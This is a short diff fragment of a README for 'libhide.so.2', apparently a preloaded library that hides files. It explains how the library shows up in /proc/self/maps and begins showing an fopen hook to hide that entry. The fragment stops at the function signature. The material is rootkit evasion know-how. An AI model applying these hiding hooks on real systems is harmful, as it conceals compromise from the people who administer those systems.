carls0n/libhide.so.2/README.md

 ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]
 ```
 As you can see above, clearly libhide.so.2 is being used here.
 In addition, if we run ls -l /usr/local/lib/, we see that there is nothing listed in that directory
 At least thats what we're being told!
 Another note, there is a way to hide this entry from cat /proc/self/maps.
-So, this may not show up if an attacker purposely hides it from virtual memory.
+So, this may not show up if an attacker purposely hides it from being read in virtual memory.
 Below is the code needed to hide from cat /proc/self/maps
 ```
 FILE *fopen(const char *pathname, const char *mode) {